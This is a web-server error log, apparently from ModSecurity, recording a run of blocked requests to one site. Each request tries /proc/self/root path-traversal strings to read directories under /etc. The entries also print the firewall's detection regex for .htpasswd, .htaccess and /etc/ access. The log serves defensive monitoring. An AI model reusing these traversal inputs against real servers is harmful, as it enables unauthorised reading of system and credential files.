referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:07:06.980775 2026] [:error] [pid 29802:tid 140411674785536] [client 74.7.241.46:54430] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhw-s_BxrYCr4hPDw8GKQAAAcg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:07:08.346140 2026] [:error] [pid 29507:tid 140411733534464] [client 74.7.241.46:59896] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhw_Er9dMAiw-8KANNk6QAAAQE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:07:09.518205 2026] [:error] [pid 10651:tid 140411616036608] [client 74.7.241.46:59908] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhw_bysWC90G-1nBrBg2AAAAY8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:07:10.779018 2026] [:error] [pid 29507:tid 140411708356352] [client 74.7.241.46:59914] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhw_kr9dMAiw-8KANNk6gAAAQQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:07:11.998210 2026] [:error] [pid 29802:tid 140411624429312] [client 74.7.241.46:59924] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhw_8_BxrYCr4hPDw8GLAAAAc4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:07:14.461256 2026] [:error] [pid 15568:tid 140411699963648] [client 74.7.241.46:59928] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhxAaQpVkWug9HeOt9PpwAAA0U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:07:15.789609 2026] [:error] [pid 14895:tid 140411557287680] [client 74.7.241.46:59942] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhxA1ajLEzk2WiQ-10uZAAAApY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:07:16.963237 2026] [:error] [pid 21805:tid 140411548894976] [client 74.7.241.46:59956] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhxBLABkC4fWIHEf8ETAwAAAFc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:07:18.253667 2026] [:error] [pid 14895:tid 140411548894976] [client 74.7.241.46:42550] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhxBlajLEzk2WiQ-10uZwAAApc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:07:19.418850 2026] [:error] [pid 21806:tid 140411590858496] [client 74.7.241.46:42556] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhxB9SswJuvopo3lOh8WAAAAJI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:07:20.713609 2026] [:error] [pid 10831:tid 140411632822016] [client 74.7.241.46:42570] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhxCI6lpbStxTqkSkuE_gAAAk0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:07:21.948643 2026] [:error] [pid 15568:tid 140411658000128] [client 74.7.241.46:42580] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhxCaQpVkWug9HeOt9PqAAAA0o"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:07:23.240622 2026] [:error] [pid 10772:tid 140411557287680] [client 74.7.241.46:42582] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhxC_9ocpUE4ed4uDwPaAAAAhY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:07:24.402342 2026] [:error] [pid 14895:tid 140411641214720] [client 74.7.241.46:42584] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhxDFajLEzk2WiQ-10uaAAAAow"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:07:25.706160 2026] [:error] [pid 14895:tid 140411716749056] [client 74.7.241.46:42594] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhxDVajLEzk2WiQ-10uawAAAoM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:07:26.835304 2026] [:error] [pid 29507:tid 140411658000128] [client 74.7.241.46:42608] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhxDkr9dMAiw-8KANNk7AAAAQo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:07:28.206195 2026] [:error] [pid 15061:tid 140411649607424] [client 74.7.241.46:60356] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhxEKTCbgAP5jq5TehHtQAAAss"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:07:29.480316 2026] [:error] [pid 29802:tid 140411548894976] [client 74.7.241.46:60372] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhxEc_BxrYCr4hPDw8GLgAAAdc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:07:30.772176 2026] [:error] [pid 10831:tid 140411565680384] [client 74.7.241.46:60378] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhxEo6lpbStxTqkSkuFAAAAAlU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:07:31.894405 2026] [:error] [pid 21806:tid 140411708356352] [client 74.7.241.46:60384] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhxE9SswJuvopo3lOh8WgAAAIQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:07:34.166108 2026] [:error] [pid 10772:tid 140411683178240] [client 74.7.241.46:60388] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhxFv9ocpUE4ed4uDwPagAAAgc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
